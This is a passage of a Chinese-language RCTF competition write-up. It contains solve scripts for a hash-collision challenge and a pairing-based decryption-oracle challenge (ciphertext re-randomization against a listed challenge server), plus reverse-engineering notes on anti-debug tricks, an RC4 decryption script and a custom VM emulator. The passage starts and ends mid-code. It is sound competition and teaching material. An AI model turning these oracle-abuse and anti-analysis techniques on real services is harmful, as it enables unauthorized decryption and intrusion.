io.sendline(raw.hex ().encode()) line = io.recvline(timeout=20 ) if not line: raise EOFError("对端在返回哈希前断开" ) s = line.decode(errors="ignore" ).strip() assert s.startswith("H = " ), f"意外返回:{s} " return bytes .fromhex(s[4 :]) def recv_round_result (io ): """发送完4条后读取回合结果行""" res = io.recvline(timeout=20 ) if not res: raise EOFError("对端在回合结果前断开" ) text = res.decode(errors="ignore" ).strip() print (text) try : extra = io.recvline(timeout=0.3 ) if extra: print (extra.decode(errors="ignore" ), end="" ) except EOFError: pass return text def play_round (io, round_idx: int ): A_short = b"" B_short = b"\x00" recv_prompt(io) H1 = send_hex_get_H(io, A_short) recv_prompt(io) H2 = send_hex_get_H(io, B_short) B1 = pad_block_of_short_msg(A_short) B2 = pad_block_of_short_msg(B_short) H1_hi, H1_lo = b2i(H1[:8 ]), b2i(H1[8 :]) H2_hi, H2_lo = b2i(H2[:8 ]), b2i(H2[8 :]) B1_lo, B2_lo = b2i(B1[8 :]), b2i(B2[8 :]) dz_hi = H1_hi ^ H2_hi dz_lo = (H1_lo ^ H2_lo) ^ (B1_lo ^ B2_lo) Dz = (dz_hi << 64 ) | dz_lo Dz_bytes = i2b128(Dz) X = os.urandom(16 ) Xp = xor_bytes(X, Dz_bytes) A_long = B1 + X B_long = B2 + Xp recv_prompt(io) _ = send_hex_get_H(io, A_long) recv_prompt(io) _ = send_hex_get_H(io, B_long) res = recv_round_result(io) if "No hash collision" in res or "Game over" in res: raise RuntimeError(f"第 {round_idx} 轮未碰撞,异常(逻辑应保证碰撞)" ) def main (): io = remote(HOST, PORT) round_idx = 1 try : for round_idx in range (1 , 501 ): log.info(f"Round {round_idx} " ) play_round(io, round_idx) log.success("完成500轮!等待flag..." ) import time time.sleep(1 ) while True : try : data = io.recv(1024 , timeout=2 ) if data: print (data.decode('utf-8' , errors='replace' )) else : break except : break except EOFError: log.info("连接关闭,尝试接收剩余数据..." ) try : while True : data = io.recv(1024 , timeout=1 ) if data: print (data.decode('utf-8' , errors='replace' )) else : break except : pass except Exception as e: log.error(f"错误: {e} " ) finally : io.close() if __name__ == "__main__" : main() 🎉 Nice! Here is your flag: RCTF{my_sponge_is_toooooooo_soft_cdb801e6adbd}
RePairing
题目背景: 这个挑战是个基于 BLS12‑381 配对的公钥加密 oracle。服务端生成 (c1, c2, c3) 密文,并把 shared_key = pairing(…) 经过 kdf 作为 XOR 密钥加密 flag。服务器会把 banner 发过来里面包括密文和加密 flag,同时接受你发来的 (c1’, c2’, c3’),解密后返回同一个 kdf(shared_key)。
攻击思路: 该方案是可重随机化的。已知原密文 (c1, c2, c3):
选随机标量 r。
c2’ = c2 + G1·r,c3’ = c3 + h1(id)·r,c1’ = c1 · pk^r。 这三个量依然是合法密文,解出来的 shared_key 与原来一样。你把 (c1’, c2’, c3’) 发给 oracle,它会返回原始的 kdf(shared_key);再和 banner 中的加密 flag 做 XOR 就能还原 flag。
实现细节:
client/src/main.rs 用的是跟服务端一致的 common crate,复用 parse_gt/parse_g1/parse_g2、hex_gt/hex_g1/hex_g2,不会出序列化不一致的问题。
程序连接 1.14.196.78 (line 42601),读取 banner,解析出 pk、h1(id)、原密文与加密 flag;用 Fr::rand 生成 r,做上面三步变换,发回新的密文;然后读回 key,并用 xor(&mut enc_flag, &key) 还原明文 flag。
目前仓库还带有一些 Python 脚本(run_solve_once.py、solve.py 等)作为探索辅助,但正解是 Rust 客户端。
让ai改完代码下载好rust后,运行cargo run -p client即可得到flag
Reverse Chaos 出糊了变成签到,运行程序即给flag
flag:RCTF{AntiDbg_KeyM0d_2025_R3v3rs3}
chaos2 Chaos的revenge版本,看到如下花指令类型
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 .text:004014E3 jnz short near ptr loc_4014E5+ 2 .text:004014E5 .text:004014E5 loc_4014E5: ; CODE XREF: .text:004014E3 ↑j .text:004014E5 jmp near ptr 40 FDD7h .text:004014E5 ; .text:004014 EA align 4 .text:004014 EC pop eax .text:004014 ED mov [ebp-88 h], eax .text:004014 F3 call loc_4014FB .text:004014 F3 ; .text:004014 F8 db 0 EAh, 0 EBh, 9 .text:004014 FB ; .text:004014 FB .text:004014 FB loc_4014FB: ; CODE XREF: .text:004014 F3↑j .text:004014 FB pop ebx .text:004014 FC inc ebx .text:004014 FD push ebx .text:004014 FE mov eax, 11111111 h .text:00401503 retn .text:00401504 ; .text:00401504 call sub_401510 .text:00401509 mov ebx, 33333333 h .text:0040150 E jmp short loc_40151D .text:00401510 .text:00401510 ; = = = = = = = = = = = = = = = S U B R O U T I N E = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = .text:00401510 .text:00401510 .text:00401510 sub_401510 proc near ; CODE XREF: .text:00401504 ↑p .text:00401510 mov ebx, 11111111 h .text:00401515 pop ebx .text:00401516 mov ebx, offset loc_40151D .text:0040151 B push ebx .text:0040151 C retn .text:0040151 C sub_401510 endp .text:0040151 C .text:0040151 D ; .text:0040151 D .text:0040151 D loc_40151D: ; CODE XREF: .text:0040150 E↑j .text:0040151 D ; DATA XREF: sub_401510+ 6 ↑o .text:0040151 D mov ebx, 22222222 h
全nop即可
加密算法是rc4
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 char __cdecl sub_4017D0 (_BYTE *a1, char *a2, unsigned int n128) { char result; char v4; int v5; int v6; unsigned int n0x100; unsigned int n0x100_1; v5 = 0 ; LOBYTE (v6) = 0 ; result = (char )a1; a1[257 ] = 0 ; a1[256 ] = 0 ; for ( n0x100 = 0 ; n0x100 < 0x100 ; ++n0x100 ) { result = n0x100 + (_BYTE)a1; a1[n0x100] = n0x100; } for ( n0x100_1 = 0 ; n0x100_1 < 0x100 ; ++n0x100_1 ) { v4 = a1[n0x100_1]; v6 = (unsigned __int8)(v6 + v4 + a2[v5]); a1[n0x100_1] = a1[(unsigned __int8)v6]; result = v4; a1[v6] = v4; if ( ++v5 >= n128 ) v5 = 0 ; } return result; } char __cdecl sub_4018A0 (_BYTE *a1, char *a2, int n128) { char result; char v5; char v6; int v7; int v8; LOBYTE (v8) = a1[256 ]; LOBYTE (v7) = a1[257 ]; while ( n128-- ) { v8 = (unsigned __int8)(v8 + 1 ); v6 = a1[v8]; v7 = (unsigned __int8)(v6 + v7); v5 = a1[v7]; a1[v8] = v5; a1[v7] = v6; *a2++ ^= a1[(unsigned __int8)(v5 + v6)]; } a1[256 ] = v8; result = v7; a1[257 ] = v7; return result; }
调试起来发现key是flag:{Th1sflaglsGo0ds}
尝试解密发现有问题,然后注意到几处反调试
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 int sub_A81090 () { int v1; uint8_t BeingDebugged; BeingDebugged = NtCurrentPeb ()->BeingDebugged; sub_A81440 (); n8 = 8 ; if ( !BeingDebugged ) *(_BYTE *)(n8 + dword_A8440C) = 'i' ; return v1; } int __cdecl sub_A81200 (int (__stdcall *a1)(HANDLE, int , int *, int , _DWORD)) { int result; HANDLE CurrentProcess; int v3; CurrentProcess = GetCurrentProcess (); result = a1 (CurrentProcess, 7 , &v3, 4 , 0 ); n8 = 14 ; if ( !v3 ) *(_BYTE *)(n8 + dword_A8440C) = 'I' ; return result; } int __cdecl sub_A813A0 (int (__stdcall *a1)(HANDLE, int , int *, int , _DWORD)) { int result; HANDLE CurrentProcess; int v3; CurrentProcess = GetCurrentProcess (); result = a1 (CurrentProcess, 31 , &v3, 4 , 0 ); n8 = 18 ; if ( v3 == 1 ) *(_BYTE *)(n8 + dword_A8440C) = 'o' ; return result; }
所以调试起来获得的密钥是错误的,正确的密钥是flag:{ThisflagIsGoods},然后注意下长度是0x80,后面全空
exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 cipher = [ 15 , 26 , -118 , 90 , 34 , -85 , 30 , 99 , 25 , 90 , -121 , -14 , -26 , -23 , -41 , -47 , -105 , -7 , -8 , 50 , 91 , -34 , 45 , -42 , -93 , 79 , 126 , -53 , 97 , -78 , 63 , -65 , -73 , 27 , 10 , -124 , -77 , -76 , -34 , 3 , 70 , 123 , -125 , -16 , -60 , -77 , -85 , 123 , 41 , -68 , 31 , -2 , -118 , 121 , 38 , -38 , 8 , 1 , -123 , 102 , 125 , -69 , -18 , 15 , -119 , 89 , -44 , 95 , -84 , 24 , -82 , 11 , 78 , -16 , -73 , 5 , 92 , -127 , 4 , -97 , -92 , 28 , 93 , -96 , -71 , 7 , -110 , 92 , -118 , 83 , -13 , -1 , -9 , -89 , -35 , 46 , -26 , -19 , 15 , 119 , 44 , 74 , 34 , -15 , 54 , 79 , -89 , -18 , 13 , -42 , 4 , 115 , 85 , 94 , 62 , -109 , -92 , 52 , 41 , 103 , -4 , 35 , 121 , 25 , -40 , -55 , 43 , -49 ] cipher = [(x + 256 ) & 0xff for x in cipher] key = list (b"flag:{ThisflagIsGoods}" )+[0 ]*(128 -len (b"flag:{ThisflagIsGoods}" )) def rc4_init (key_bytes ): S = list (range (256 )) j = 0 key_len = len (key_bytes) for i in range (256 ): j = (j + S[i] + key_bytes[i % key_len]) & 0xff S[i], S[j] = S[j], S[i] return S def rc4_crypt (S, data ): i = 0 j = 0 out = [] for idx, b in enumerate (data): i = (i + 1 ) & 0xff Si = S[i] j = (j + Si) & 0xff Sj = S[j] S[i], S[j] = Sj, Si K = S[(Si + Sj) & 0xff ] out.append(b ^ K) return bytes (out) def main (): if len (key) != 0x80 : return S = rc4_init(key) plain = rc4_crypt(S, cipher) print (plain) try : print ("decoded:" , plain.decode('utf-8' , errors='ignore' )) except : pass if __name__ == "__main__" : main()
解得flag:RCTF{AntiDbg_Reversing_2025_v2.0_Ch4llenge}
Onion 非常复杂的vm,题目要求输入50行数字,最开始尝试左移、右移、异或这些常见运算指令下条件断点试图打印,结果发现看不出规律且调用非常多,无奈去同构VM,不得不说GPT5同构能力非常强,vm代码喂给它给了份python实现,稍微修改下加入log,对比动态调试的数据对的上就可以用了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 import structMEM_SIZE = 0x10000 DATA_QWORD_BASE = 7168 DATA_BASE = DATA_QWORD_BASE * 8 def u8 (x ): return x & 0xFF def u16 (x ): return x & 0xFFFF def u32 (x ): return x & 0xFFFFFFFF def u64 (x ): return x & 0xFFFFFFFFFFFFFFFF class VM : def __init__ (self, vmcode: bytes , input_ints=None , debug_after_n=None ): self .mem = bytearray (MEM_SIZE) if len (vmcode) > DATA_BASE: raise ValueError("vmcode too large" ) self .mem[:len (vmcode)] = vmcode self .regs = [0 ] * 8 self .ip = 0 self .dp = 0xFFFF self .base0 = 0 self .base1 = 0 self .base2 = 0 self .zf = False self .run_flag = True self .output = None self .debug_ok = False self .num = 0 self .debug_after_n = debug_after_n if input_ints is not None : for idx, val in enumerate (input_ints): if idx >= 50 : break off = DATA_BASE + idx * 8 struct.pack_into("<Q" , self .mem, off, u64(val)) def read_u8 (self, addr ): addr &= 0xFFFF return self .mem[addr] def read_u16 (self, addr ): addr &= 0xFFFF if addr == 0xFFFF : return self .mem[addr] return self .mem[addr] | (self .mem[(addr + 1 ) & 0xFFFF ] << 8 ) def write_u8 (self, addr, val ): addr &= 0xFFFF self .mem[addr] = u8(val) def read_u64 (self, addr ): addr &= 0xFFFF bs = bytes (self .mem[addr:addr+8 ] + self .mem[:max (0 , addr+8 -MEM_SIZE)]) return struct.unpack_from("<Q" , bs, 0 )[0 ] def write_u64 (self, addr, val ): addr &= 0xFFFF b = struct.pack("<Q" , u64(val)) for i in range (8 ): self .mem[(addr + i) & 0xFFFF ] = b[i] def fetch_u8 (self ): b = self .read_u8(self .ip) self .ip = u16(self .ip + 1 ) return b def fetch_u16 (self ): lo = self .read_u8(self .ip) hi = self .read_u8(self .ip + 1 ) self .ip = u16(self .ip + 2 ) return (hi << 8 ) | lo def step (self, debug=False ): ip0 = self .ip opcode = self .fetch_u8() def log (msg ): if (debug or self .debug_ok) and self .num >= self .debug_after_n-1 : print (f"[IP={ip0:04x} OP={opcode:02x} ] {msg} " ) if opcode == 0x00 : log("NOP" ) return elif opcode == 0x01 : imm = self .fetch_u16() log(f"JMP 0x{imm:04x} " ) self .ip = imm elif opcode == 0x02 : imm = self .fetch_u16() log(f"JNZ 0x{imm:04x} , ZF={self.zf} " ) if not self .zf: self .ip = imm elif opcode == 0x03 : imm = self .fetch_u16() log(f"JZ 0x{imm:04x} , ZF={self.zf} " ) if self .zf: self .ip = imm elif opcode == 0x11 : imm = self .fetch_u16() log(f"SET base0 = 0x{imm:04x} " ) self .base0 = imm elif opcode == 0x12 : imm = self .fetch_u16() log(f"SET base1 = 0x{imm:04x} " ) self .base1 = imm elif opcode == 0x15 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x15" ) val = self .read_u64(self .base0) log(f"LDQ R{reg} = [0x{self.base0:04x} ] => 0x{val:016x} " ) self .regs[reg] = val elif opcode == 0x16 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x16" ) b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) self .regs[reg] = imm self .zf = (imm == 0 ) log(f"LDI R{reg} = 0x{imm:016x} , ZF={self.zf} " ) elif opcode == 0x17 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x17" ) self .regs[dst] = self .regs[src] self .zf = (self .regs[dst] == 0 ) log(f"MOV R{dst} = R{src} (0x{self.regs[dst]:016x} ), ZF={self.zf} " ) elif opcode == 0x18 : reg = self .fetch_u8() off = self .fetch_u16() if reg >= 8 : raise IndexError("reg out of range in 0x18" ) addr = u16(self .base0 + off) val = self .read_u64(addr) self .regs[reg] = val log(f"LDQ R{reg} = [base0 + 0x{off:04x} ] @0x{addr:04x} => 0x{val:016x} " ) elif opcode == 0x19 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x19" ) self .write_u64(self .base0, self .regs[reg]) log(f"STQ [0x{self.base0:04x} ] = R{reg} (0x{self.regs[reg]:016x} )" ) elif opcode == 0x1A : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x1A" ) idx = u16(self .regs[src]) addr = u16(self .base0 + idx) val = self .read_u8(addr) self .regs[dst] = val log(f"LDB R{dst} = [base0 + (u16)R{src} ] @0x{addr:04x} => 0x{val:02x} " ) elif opcode == 0x1B : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x1B" ) idx = u16(self .regs[src]) addr = u16(self .base0 + idx) val = u8(self .regs[dst]) self .write_u8(addr, val) log(f"STB [base0 + (u16)R{src} ] @0x{addr:04x} = R{dst} .lo (0x{val:02x} )" ) elif opcode == 0x1C : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x1C" ) old = self .regs[reg] self .regs[reg] = u64(old + 1 ) self .zf = (old == 0xFFFFFFFFFFFFFFFF ) log(f"INC R{reg} : 0x{old:016x} -> 0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x1D : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x1D" ) old = self .regs[reg] self .regs[reg] = u64(old - 1 ) self .zf = (old == 1 ) log(f"DEC R{reg} : 0x{old:016x} -> 0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x1E : reg = self .fetch_u8() shift = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x1E" ) val = self .regs[reg] res = u64(val >> (shift & 0x3F )) self .regs[reg] = res self .zf = (res == 0 ) log(f"SHR R{reg} >>= {shift & 0x3F } : 0x{val:016x} -> 0x{res:016x} , ZF={self.zf} " ) elif opcode == 0x1F : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x1F" ) old = self .base0 self .base0 = u16(self .base0 + u16(self .regs[reg])) log(f"ADD base0 += (u16)R{reg} : 0x{old:04x} -> 0x{self.base0:04x} " ) elif opcode == 0x25 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x25" ) old = self .regs[dst] self .regs[dst] = u64(old & self .regs[src]) self .zf = (self .regs[dst] == 0 ) log(f"AND R{dst} &= R{src} : 0x{old:016x} & 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x} , ZF={self.zf} " ) elif opcode == 0x26 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x26" ) old = self .regs[dst] self .regs[dst] = u64(old ^ self .regs[src]) self .zf = (self .regs[dst] == old) log(f"XOR R{dst} ^= R{src} : 0x{old:016x} ^ 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x} , ZF={self.zf} " ) elif opcode == 0x27 : reg = self .fetch_u8() shift = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x27" ) val = self .regs[reg] res = u64(val << (shift & 0x3F )) self .regs[reg] = res self .zf = (res == 0 ) log(f"SHL R{reg} <<= {shift & 0x3F } : 0x{val:016x} -> 0x{res:016x} , ZF={self.zf} " ) elif opcode == 0x29 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x29" ) b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) old = self .regs[reg] self .regs[reg] = u64(old ^ imm) self .zf = (old == imm) log(f"XOR R{reg} ^= imm64 0x{imm:016x} : 0x{old:016x} -> 0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x2A : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x2A" ) b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) old = self .regs[reg] self .regs[reg] = u64(old & imm) self .zf = (self .regs[reg] == 0 ) log(f"AND R{reg} &= imm64 0x{imm:016x} : 0x{old:016x} -> 0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x2B : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x2B" ) idx = u16(self .regs[src]) addr = u16(self .base1 + idx) val = self .read_u8(addr) self .regs[dst] = val log(f"LDB R{dst} = [base1 + (u16)R{src} ] @0x{addr:04x} => 0x{val:02x} " ) elif opcode == 0x2C : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : raise IndexError("reg out of range in 0x2C" ) idx = u16(self .regs[src]) addr = u16(self .base1 + idx) val = u8(self .regs[dst]) self .write_u8(addr, val) log(f"STB [base1 + (u16)R{src} ] @0x{addr:04x} = R{dst} .lo (0x{val:02x} )" ) elif opcode == 0x32 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x32" ) b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) self .zf = (self .regs[reg] == imm) log(f"CMP R{reg} == 0x{imm:016x} ? R{reg} =0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x80 : self .base2 = self .ip log(f"SET base2 = ip = 0x{self.ip:04x} " ) elif opcode == 0x81 : idx = self .fetch_u8() if not hasattr (self , "fun_table" ): self .fun_table = {} self .fun_table[idx] = u16(self .base2 + 3 ) log(f"DEF FN[{idx} ] = 0x{self.fun_table[idx]:04x} " ) elif opcode == 0x82 : idx = self .fetch_u8() if not hasattr (self , "fun_table" ) or idx not in self .fun_table: raise KeyError(f"function idx {idx} not registered" ) ret = self .ip self .dp = u16(self .dp - 2 ) self .write_u8(self .dp, ret & 0xFF ) self .write_u8(self .dp + 1 , (ret >> 8 ) & 0xFF ) self .ip = self .fun_table[idx] log(f"CALL FN[{idx} ] -> 0x{self.ip:04x} , push RET=0x{ret:04x} at dp=0x{self.dp:04x} " ) elif opcode == 0x83 : if self .dp == 0xFFFF : log("RET with empty stack -> halt" ) self .run_flag = False return lo = self .read_u8(self .dp) hi = self .read_u8(self .dp + 1 ) ret = (hi << 8 ) | lo self .dp = u16(self .dp + 2 ) log(f"RET to 0x{ret:04x} , new dp=0x{self.dp:04x} " ) self .ip = ret elif opcode == 0x84 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x84" ) self .dp = u16(self .dp - 8 ) self .write_u64(self .dp, self .regs[reg]) self .output = self .regs[reg] log(f"RETVAL R{reg} = 0x{self.regs[reg]:016x} stored at dp=0x{self.dp:04x} , HALT" ) elif opcode == 0x85 : reg = self .fetch_u8() if reg >= 8 : raise IndexError("reg out of range in 0x85" ) val = self .read_u64(self .dp) self .regs[reg] = val self .dp = u16(self .dp + 8 ) log(f"POPQ R{reg} = [dp] => 0x{val:016x} , new dp=0x{self.dp:04x} " ) elif opcode == 0x90 : arg = self .fetch_u8() log(f"SYSCALL 0x90 arg=0x{arg:02x} (NOT IMPLEMENTED) -> HALT" ) else : log(f"UNKNOWN opcode -> HALT" ) self .run_flag = False def run (self, debug=False ): steps = 0 while self .run_flag: self .step(debug=debug) steps += 1 return self .output def run_vm_with_ints (ints, vmcode_path="full_vmcode" , debug=False ): with open (vmcode_path, "rb" ) as f: code = f.read() vm = VM(code, input_ints=ints, debug_after_n=0 ) out = vm.run(debug=debug) return out, vm if __name__ == "__main__" : ints = [1633771873 , 13767982679358783948 , 11713643540287541804 , 1684300900 , 1701143909 , 1717986918 , 1734829927 , 1751672936 , 14773488025708418042 , 1785358954 , 1802201963 , 1819044972 , 1835887981 , 1852730990 , 1869573999 , 1886417008 , 1903260017 , 3919366872831373201 , 11451939409513851430 , 1953789044 , 17235855896972825888 , 1987475062 , 2004318071 , 2021161080 , 2038004089 , 2054847098 , 1094795585 , 1111638594 , 1128481603 , 5295387722887053174 , 15356410353063384153 , 12187465423418120720 , 1195853639 , 1212696648 , 1229539657 , 1246382666 , 1263225675 , 1280068684 , 1296911693 , 1313754702 , 1330597711 , 1347440720 , 1364283729 , 1381126738 , 1397969747 , 1414812756 , 1431655765 , 1448498774 , 11625777768394830813 , 1482184792 ] ints = 1633771873 ,1650614882 ,1667457891 ,1684300900 ,1701143909 ,1717986918 ,1734829927 ,1751672936 ,1768515945 ,1785358954 ,1802201963 ,1819044972 ,1835887981 ,1852730990 ,1869573999 ,1886417008 ,1903260017 ,1920103026 ,1936946035 ,1953789044 ,1970632053 ,1987475062 ,2004318071 ,2021161080 ,2038004089 ,2054847098 ,1094795585 ,1111638594 ,1128481603 ,1145324612 ,1162167621 ,1179010630 ,1195853639 ,1212696648 ,1229539657 ,1246382666 ,1263225675 ,1280068684 ,1296911693 ,1313754702 ,1330597711 ,1347440720 ,1364283729 ,1381126738 ,1397969747 ,1414812756 ,1431655765 ,1448498774 ,1465341783 ,1482184792 ,1499027801 ,1515870810 out, vm = run_vm_with_ints(ints, vmcode_path="full_vmcode" , debug=True ) if out is None : print ("VM finished without explicit 0x84 output" ) else : print (f"VM output: {out} (0x{out:016x} )" )
上面可以完整的打印所有流程,输入ints我最开始构造的是aaaa、bbbb等ascii_letters[:50],最开始可以把log注释全部取消,debug参数改为True可以看到完整流程
观察到第一组数据读出了0x63636363,也就是第三个数,然后会运行到opcode为0x90的地方,可以发现打印Fail前面正好有一处cmp比较了数值,测试发现第一个数是固定的,第二个是我们输入的数字经过加密得到的
我们可以简化下代码,实际上可以只看数字读取开始 到cmp比较 中间的运算代码,jmp类log、数据读取类均可以注释掉,方便我们分析运算代码(具体修改是把debug改为False、opcode 0x18那里增加reg==0时候设置debug_ok开始打印日志),此时一轮check日志可以缩减为2000行左右了,可以把一轮的日志喂给各种ai让他们各显神通
最后抽象整理出了几个函数,在之后的几轮check发现都用到了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 def loop_64bit (r0, r6 ): while True : r7 = r0 r7 = (r7 & r6) & mask64 r0 = (r0 ^ r6) & mask64 if r7 == 0 : break r7 = (r7 << 1 ) & mask64 r6 = r7 return r0 def build_r2_schedule (): """ r2,r3,r4,r5 的更新和 r0,r1 无关,所以可以单独跑出每一轮的 r2_k。 返回长度为 27 的数组 R2[k] = 第 k 轮使用的 r2。 """ r2 = 0x6df9f721 r3 = 0x8d85b315 r4 = 0x40bc0884 r5 = 0x28e3d333 R2 = [] for k in range (27 ): R2.append(r2) if k == 0x1a : continue r0_g_in = r3 r1_g_in = r2 r2_g_in = k r0_H_A = func_A_32bit(r0_g_in) r0_H_B = func_B_32bit(r0_H_A, r1_g_in) r0_H_C = func_C_32bit(r0_H_B, r2_g_in) r1_H_D = func_D_32bit(r1_g_in) r1_H_E = func_E_32bit(r0_H_C, r1_H_D) r2, r3, r4, r5 = r1_H_E, r4, r5, r0_H_C return R2 def rol32 (x, n ): return ((x << n) | (x >> (32 - n))) & mask32 def ror32 (x, n ): return ((x >> n) | (x << (32 - n))) & mask32 def inv_upper_round (r0_next, r1_next, r2_k ): """ 逆向一轮上半轮: 输入:本轮输出的 (r0_next, r1_next) 以及该轮使用的 r2_k 输出:本轮输入的 (r0_prev, r1_prev) """ c0 = r0_next & mask32 e1 = r1_next & mask32 d1 = (e1 ^ c0) & mask32 r1_prev = ror32(d1, 3 ) b0 = (c0 ^ r2_k) & mask32 a0 = (b0 - r1_prev) & mask32 r0_prev = rol32(a0, 8 ) return r0_prev, r1_prev
其中比较重要的是loop_64bit和build_r2_schedule,都传入了常量,但是发现顺序有所不同
这里列下check2和check3,需要注意在前一个check不过的情况下无法打印下一组的check日志,貌似前后有些依赖,第二轮的cmp值我并没有在vmcode里搜索到
check2的解密如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 mask64 = 0xFFFFFFFFFFFFFFFF mask32 = 0xFFFFFFFF def func_A_32bit (r_in ): r6 = r_in & mask32 r7 = r_in & mask32 r6 = (r6 >> 8 ) & mask32 r7 = (r7 << 24 ) & mask32 r6 = (r6 ^ r7) & mask32 return r6 & mask32 def func_B_32bit (r0, r1 ): r6 = r1 & mask32 r0 &= mask32 while True : r7 = r0 r7 = (r7 & r6) & mask32 r0 = (r0 ^ r6) & mask32 if r7 == 0 : break r7 = (r7 << 1 ) & mask32 r6 = r7 return r0 & mask32 def func_C_32bit (r0, r2 ): return (r0 ^ r2) & mask32 def func_D_32bit (r_in ): r6 = r_in & mask32 r7 = r_in & mask32 r6 = (r6 << 3 ) & mask32 r7 = (r7 >> 29 ) & mask32 r6 = (r6 ^ r7) & mask32 return r6 & mask32 def func_E_32bit (r0, r1 ): return (r1 ^ r0) & mask32 def loop_64bit (r0, r6 ): while True : r7 = r0 r7 = 